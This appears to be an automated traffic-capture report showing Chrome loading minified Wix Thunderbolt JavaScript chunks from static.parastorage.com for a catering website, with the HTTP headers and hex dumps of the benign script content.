                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 7a 65 3d 7b 7d 3b 61 2e 72 28 7a 65 29 2c 61 2e 64 28 7a 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 53 63 2c 6e 61 6d 65 3a 28 29 3d 3e 54 63 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 50 63 7d 29 3b 76 61 72 20 4c 65 3d 7b 7d 3b 61 2e 72 28 4c 65 29 2c 61 2e 64 28 4c 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 43 63 2c 6e 61 6d 65 3a 28 29 3d 3e 4d 63 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 49 63 7d 29 3b 76 61 72 20 55 65 3d 7b 7d 3b 61 2e 72 28 55 65 29 2c 61 2e 64 28 55 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 44 63 2c 6e 61 6d 65 3a 28 29 3d 3e 45 63 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 41 63 7d 29 3b 76 61 72 20 6a 65 3d 7b 7d 3b 61 2e 72 28 6a 65 29 2c 61 2e 64 28 6a 65 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 56 63
                                                                                                                                                                                                                        Data Ascii: ze={};a.r(ze),a.d(ze,{animate:()=>Sc,name:()=>Tc,properties:()=>Pc});var Le={};a.r(Le),a.d(Le,{animate:()=>Cc,name:()=>Mc,properties:()=>Ic});var Ue={};a.r(Ue),a.d(Ue,{animate:()=>Dc,name:()=>Ec,properties:()=>Ac});var je={};a.r(je),a.d(je,{animate:()=>Vc
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 3a 28 29 3d 3e 4a 65 2c 66 6f 6c 64 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 65 74 2c 67 6c 69 64 65 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 74 74 2c 72 65 76 65 61 6c 4d 6f 62 69 6c 65 3a 28 29 3d 3e 61 74 2c 73 6c 69 64 65 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 6e 74 2c 73 70 69 6e 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 69 74 2c 74 75 72 6e 49 6e 4d 6f 62 69 6c 65 3a 28 29 3d 3e 72 74 7d 29 3b 76 61 72 20 73 74 3d 7b 7d 3b 61 2e 72 28 73 74 29 2c 61 2e 64 28 73 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 48 75 2c 6e 61 6d 65 3a 28 29 3d 3e 59 75 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 44 75 7d 29 3b 76 61 72 20 64 74 3d 7b 7d 3b 61 2e 72 28 64 74 29 2c 61 2e 64 28 64 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 4b 75 2c 6e 61 6d 65 3a 28 29 3d
                                                                                                                                                                                                                        Data Ascii: e:()=>Je,foldInMobile:()=>et,glideInMobile:()=>tt,revealMobile:()=>at,slideInMobile:()=>nt,spinInMobile:()=>it,turnInMobile:()=>rt});var st={};a.r(st),a.d(st,{animate:()=>Hu,name:()=>Yu,properties:()=>Du});var dt={};a.r(dt),a.d(dt,{animate:()=>Ku,name:()=
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 29 2c 61 2e 64 28 42 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 6c 6d 2c 6e 61 6d 65 3a 28 29 3d 3e 73 6d 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 64 6d 7d 29 3b 76 61 72 20 54 74 3d 7b 7d 3b 61 2e 72 28 54 74 29 2c 61 2e 64 28 54 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 67 6d 2c 6e 61 6d 65 3a 28 29 3d 3e 6d 6d 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 70 6d 7d 29 3b 76 61 72 20 50 74 3d 7b 7d 3b 61 2e 72 28 50 74 29 2c 61 2e 64 28 50 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 78 6d 2c 6e 61 6d 65 3a 28 29 3d 3e 79 6d 2c 70 72 6f 70 65 72 74 69 65 73 3a 28 29 3d 3e 62 6d 7d 29 3b 76 61 72 20 6b 74 3d 7b 7d 3b 61 2e 72 28 6b 74 29 2c 61 2e 64 28 6b 74 2c 7b 61 6e 69 6d 61 74 65 3a 28 29 3d 3e 54 6d 2c 6e 61 6d 65 3a 28 29 3d 3e 5f 6d
                                                                                                                                                                                                                        Data Ascii: ),a.d(Bt,{animate:()=>lm,name:()=>sm,properties:()=>dm});var Tt={};a.r(Tt),a.d(Tt,{animate:()=>gm,name:()=>mm,properties:()=>pm});var Pt={};a.r(Pt),a.d(Pt,{animate:()=>xm,name:()=>ym,properties:()=>bm});var kt={};a.r(kt),a.d(kt,{animate:()=>Tm,name:()=>_m


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        117192.168.2.55006634.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC627OUTGET /services/wix-thunderbolt/dist/group_36.dabdc384.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1192INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 805
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: _9pymu5N8axkcuVX.9sb5jQH0j.wK2dU
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 968831394
                                                                                                                                                                                                                        X-Cache-Status: MISS
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ,2iuX5LYwvZa9CoGaG8ZUZh/UsIXy25E2og5JiYX0UsYJC5ihjDbfvfVz+xeJaaamQIy7SrWyFT8Nia0GQvKuYA==
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 10:07:04 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 272767
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 10:03:16 GMT
                                                                                                                                                                                                                        ETag: "e65b3e16d1790e074abfd552358f79a2"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC198INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 38 39 36 5d 2c 7b 39 34 31 30 39 3a 28 65 2c 73 2c 6e 29 3d 3e 7b 6e 2e 72 28 73 29 2c 6e 2e 64 28 73 2c 7b 70 61 67 65 3a 28 29 3d 3e 75 7d 29 3b 76 61 72 20 6f 3d 6e 28 36 32 31 35 35 29 2c 61 3d 6e 2e 6e 28 6f 29 2c 70 3d 6e 28 37 37 37 34 38 29 2c 74 3d 6e 28 32 30 35 39 30
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[9896],{94109:(e,s,n)=>{n.r(s),n.d(s,{page:()=>u});var o=n(62155),a=n.n(o),p=n(77748),t=n(20590
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC607INData Raw: 29 2c 69 3d 6e 28 34 37 38 29 2c 6c 3d 6e 28 39 38 35 38 29 2c 64 3d 6e 28 36 39 34 33 34 29 3b 63 6f 6e 73 74 20 63 3d 28 30 2c 70 2e 4f 67 29 28 5b 28 30 2c 70 2e 4b 54 29 28 74 2e 47 70 2c 6c 2e 55 29 2c 69 2e 65 5d 2c 28 28 65 2c 73 29 3d 3e 28 7b 6e 61 6d 65 3a 22 6f 6e 6c 6f 61 64 43 6f 6d 70 73 42 65 68 61 76 69 6f 72 73 22 2c 70 61 67 65 57 69 6c 6c 4d 6f 75 6e 74 28 29 7b 63 6f 6e 73 74 7b 63 6f 6d 70 73 42 65 68 61 76 69 6f 72 73 3a 6e 7d 3d 65 2c 6f 3d 28 30 2c 64 2e 4e 29 28 7b 69 73 52 65 73 70 6f 6e 73 69 76 65 3a 21 30 7d 29 2c 70 3d 28 30 2c 64 2e 4e 29 28 7b 69 73 52 65 73 70 6f 6e 73 69 76 65 3a 21 31 7d 29 2c 74 3d 61 28 29 2e 6d 61 70 56 61 6c 75 65 73 28 6e 2c 28 28 7b 63 6f 6c 6c 61 70 73 65 4f 6e 4c 6f 61 64 3a 65 2c 68 69 64 64 65
                                                                                                                                                                                                                        Data Ascii: ),i=n(478),l=n(9858),d=n(69434);const c=(0,p.Og)([(0,p.KT)(t.Gp,l.U),i.e],((e,s)=>({name:"onloadCompsBehaviors",pageWillMount(){const{compsBehaviors:n}=e,o=(0,d.N)({isResponsive:!0}),p=(0,d.N)({isResponsive:!1}),t=a().mapValues(n,(({collapseOnLoad:e,hidde


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        118192.168.2.55006834.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC639OUTGET /services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1308INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1017
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: 9th16d0Wno6KbSVznymvEZuOifxETZeQ
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 1047545424
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 238283649
                                                                                                                                                                                                                        X-Cache-Status: MISS
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH,aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ,2iuX5LYwvZa9CoGaG8ZUZh/UsIXy25E2og5JiYX0UsbqchCbGcrPC0bOjfdt6Ry0QIy7SrWyFT8Nia0GQvKuYA==
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 10:07:04 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 272768
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 10:03:18 GMT
                                                                                                                                                                                                                        ETag: "03c1e10720544532e4c6ad6c77551d15"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC82INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunde
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC935INData Raw: 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 39 35 2c 35 33 37 37 5d 2c 7b 36 39 34 33 34 3a 28 69 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 4e 3a 28 29 3d 3e 6d 7d 29 3b 63 6f 6e 73 74 20 6c 3d 7b 76 69 73 69 62 69 6c 69 74 79 3a 22 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 22 2c 68 65 69 67 68 74 3a 22 30 20 21 69 6d 70 6f 72 74 61 6e 74 22 2c 77 69 64 74 68 3a 22 30 20 21 69 6d 70 6f 72 74 61 6e 74 22 2c 22 6d 69 6e 2d 77 69 64 74 68 22 3a 22 30 20 21 69 6d 70 6f 72 74 61 6e 74 22 2c 22 6d 69 6e 2d 68 65 69 67 68 74 22 3a 22 30 20 21 69 6d 70 6f 72 74 61 6e 74 22 2c 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 22 3a 22 30 20 21 69 6d
                                                                                                                                                                                                                        Data Ascii: rbolt_app||[]).push([[695,5377],{69434:(i,t,n)=>{n.d(t,{N:()=>m});const l={visibility:"hidden !important",overflow:"hidden !important",height:"0 !important",width:"0 !important","min-width":"0 !important","min-height":"0 !important","margin-bottom":"0 !im


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        119192.168.2.55006934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC406OUTGET /services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 689
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: LZEZkvFqeQEqoYjOXr7jwgQH_dKXeCpF
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 927289293 957957258
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 636113194
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273552
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:48:57 GMT
                                                                                                                                                                                                                        ETag: "a0ecc37aaddba206911fa5c067b2825b"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC229INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 32 36 35 5d 2c 7b 33 33 33 36 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 72 28 74 29 2c 72 2e 64 28 74 2c 7b 65 64 69 74 6f 72 50 61 67 65 3a 28 29 3d 3e 62 2c 70 61 67 65 3a 28 29 3d 3e 67 7d 29 3b 76 61 72 20 6e 3d 72 28 32 30 36 33 36 29 2c 6f 3d 72 28 37 37 37 34 38 29 3b 63 6f 6e 73 74 20 61 3d 5b 22 56 65 72 74 69 63 61 6c 4d 65 6e 75 22 5d 2c 70 3d 22 45 78 70 61
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[7265],{33368:(e,t,r)=>{r.r(t),r.d(t,{editorPage:()=>b,page:()=>g});var n=r(20636),o=r(77748);const a=["VerticalMenu"],p="Expa
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC460INData Raw: 6e 64 61 62 6c 65 4d 65 6e 75 22 2c 6c 3d 22 44 72 6f 70 44 6f 77 6e 4d 65 6e 75 22 2c 73 3d 22 53 74 79 6c 61 62 6c 65 48 6f 72 69 7a 6f 6e 74 61 6c 4d 65 6e 75 22 3b 76 61 72 20 75 3d 72 28 37 31 30 38 35 29 3b 63 6f 6e 73 74 20 63 3d 28 65 2c 74 29 3d 3e 72 3d 3e 28 7b 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 73 3a 65 2c 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 4d 6f 75 6e 74 3a 65 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 72 2e 67 65 74 46 75 6c 6c 55 72 6c 57 69 74 68 6f 75 74 51 75 65 72 79 50 61 72 61 6d 73 28 29 3b 65 2e 75 70 64 61 74 65 50 72 6f 70 73 28 7b 5b 74 5d 3a 6e 7d 29 7d 7d 29 2c 69 3d 28 30 2c 6f 2e 4f 67 29 28 5b 75 2e 24 31 5d 2c 63 28 5b 2e 2e 2e 61 2c 73 5d 2c 22 63 75 72 72 65 6e 74 50 61 67 65 48 72 65 66 22 29 29 2c 5f 3d 28 30 2c 6f 2e 4f
                                                                                                                                                                                                                        Data Ascii: ndableMenu",l="DropDownMenu",s="StylableHorizontalMenu";var u=r(71085);const c=(e,t)=>r=>({componentTypes:e,componentWillMount:e=>{const n=r.getFullUrlWithoutQueryParams();e.updateProps({[t]:n})}}),i=(0,o.Og)([u.$1],c([...a,s],"currentPageHref")),_=(0,o.O


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        120192.168.2.55007234.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC627OUTGET /services/wix-thunderbolt/dist/group_24.8fa71ce8.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1114INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 06:45:17 GMT
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Content-Length: 2551
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        Last-Modified: Fri, 10 Jan 2025 05:59:13 GMT
                                                                                                                                                                                                                        ETag: "9ccb09f4fce4f2315901055bf54c1f20"
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: eDoEirkSQS4c5Rpfyq2bq0F.rJde37te
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 1067367068 907234298
                                                                                                                                                                                                                        Age: 25675
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        x-cache: miss
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC276INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 32 35 33 5d 2c 7b 37 31 38 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 70 61 67 65 3a 28 29 3d 3e 66 7d 29 3b 76 61 72 20 6f 3d 6e 28 37 37 37 34 38 29 2c 72 3d 6e 28 32 30 35 39 30 29 2c 63 3d 6e 28 33 32 31 36 36 29 2c 61 3d 6e 28 38 37 37 31 31 29 2c 73 3d 6e 28 33 39 32 31 38 29 2c 64 3d 6e 28 31 30 35 35 33 29 2c 6c 3d 6e 28 34 33 32 37 32 29 2c 69 3d 6e 28 31 37 37 30 39 29 2c 70 3d 6e 2e 6e 28 69 29 2c 67
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[8253],{7185:(e,t,n)=>{n.r(t),n.d(t,{page:()=>f});var o=n(77748),r=n(20590),c=n(32166),a=n(87711),s=n(39218),d=n(10553),l=n(43272),i=n(17709),p=n.n(i),g
